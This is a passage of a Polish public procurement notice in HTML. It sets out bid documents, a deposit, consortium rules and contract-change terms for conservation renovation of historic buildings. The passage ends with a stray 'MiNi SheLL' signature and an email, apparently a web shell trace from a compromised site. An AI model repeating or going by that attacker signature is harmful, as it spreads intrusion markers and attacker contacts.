składania ofert (lub w okresie działalności, jeśli krótszy), z podaniem: rodzaju robót, wartości, daty i miejsca wykonania oraz odbiorcy, wraz z dokumentami potwierdzającymi należyte wykonanie (np. referencje, protokoły odbioru). Wymagana jest realizacja co najmniej 2 zamówień związanych z renowacją budynków lub ich elementów przy obiektach zabytkowych pod nadzorem konserwatora.<br/>2. Wykaz osób skierowanych do realizacji zamówienia, wraz z informacjami o posiadanych kwalifikacjach zawodowych, uprawnieniach, doświadczeniu i wykształceniu, zakresie obowiązków oraz podstawie do dysponowania daną osobą.<br/>Wyjaśnienia dotyczące podmiotowych środków dowodowych:<br/>Zamawiający może wezwać Wykonawcę do złożenia wyjaśnień dotyczących złożonych podmiotowych środków dowodowych, w tym także w zakresie faktycznego doświadczenia, kwalifikacji personelu oraz zakresu realizowanych robót.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Jeżeli Wykonawca powołuje się na zastosowanie rozwiązań równoważnych w stosunku do materiałów, produktów, urządzeń lub technologii wskazanych przez Zamawiającego w opisie przedmiotu zamówienia (Rozdział III SWZ), zobowiązany jest wykazać, że oferowane rozwiązania w równoważnym stopniu spełniają wymagania określone przez Zamawiającego. W tym celu Wykonawca zobowiązany jest złożyć wraz z ofertą odpowiednie przedmiotowe środki dowodowe, zgodnie z art. 104– 107 ustawy Prawo zamówień publicznych.<br/>W szczególności jako przedmiotowe środki dowodowe, mogą zostać załączone odpowiednio:<br/>• Krajowa Deklaracja Właściwości Użytkowych,<br/>• Krajowa Ocena Techniczna,<br/>• Deklaracja Właściwości Użytkowych,<br/>• Atest higieniczny,<br/>• Aprobata techniczna,<br/>• Deklaracja zgodności,<br/>• Certyfikat zgodności,<br/>• Karty techniczne lub inne dokumenty producenta potwierdzające cechy użytkowe.<br/>Zamawiający nie będzie wzywał do uzupełnienia przedmiotowych środków dowodowych złożonych na potwierdzenie równoważności. Brak ich złożenia wraz z ofertą może skutkować odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp jako niezgodnej z warunkami zamówienia.<br/>W przypadku składania dokumentów w języku obcym należy dołączyć ich tłumaczenie na język polski. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> •	Formularz kryterium oceny ofert (Załącznik nr 2 do SWZ) – jeśli dotyczy.<br/>• Odpis z KRS, CEIDG lub innego właściwego rejestru.<br/>• Pełnomocnictwo – jeśli dotyczy.<br/>• Dokumenty dotyczące podmiotów udostępniających zasoby – (zał. Nr 8 do SWZ) (jeśli dotyczy.) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania o udzielenie zamówienia, Wykonawca zobowiązany jest do wniesienia wadium w wysokości 5 872,00 zł (słownie: pięć tysięcy osiemset siedemdziesiąt dwa złote). Wadium należy wnieść przed upływem terminu składania ofert. Do oferty należy załączyć dokument potwierdzający wniesienie wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>1.Wykonawcy składający ofertę wspólną muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu.<br/>2.Pełnomocnictwo musi być dołączone do oferty.<br/>3.Każdy z Wykonawców wspólnie ubiegających się o zamówienie musi złożyć oświadczenia potwierdzające brak podstaw do wykluczenia.<br/>4.W przypadku polegania na zdolnościach zawodowych – konieczne jest oświadczenie wskazujące zakres wykonywanych przez każdego Wykonawcę prac (Załącznik nr 9 do SWZ).<br/>5.Wynagrodzenie zostanie przekazane na konto lidera konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust. 1 ustawy Pzp, Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy, w przypadkach określonych w § 15 Wzoru umowy, w szczególności w odniesieniu do:<br/>a) zmiany terminu realizacji z powodu wystąpienia nieprzewidzianych okoliczności, takich jak:<br/>• odkrycia archeologiczne lub konserwatorskie,<br/>• warunki atmosferyczne uniemożliwiające realizację prac budowlanych zgodnie ze sztuką konserwatorską,• decyzje organów konserwatorskich wpływające na zakres robót.<br/>b) zmiany technologii wykonania, jeżeli uzasadnia to konieczność zachowania właściwych standardów konserwatorskich lub wymaga tego stan techniczny obiektu, pod warunkiem akceptacji przez nadzór konserwatorski i Zamawiającego.<br/>c) innych przypadków określonych w Wzorze umowy, niezbędnych dla prawidłowej realizacji przedmiotu zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem interaktywnego formularza oferty udostępnionego na platformie e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-02 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com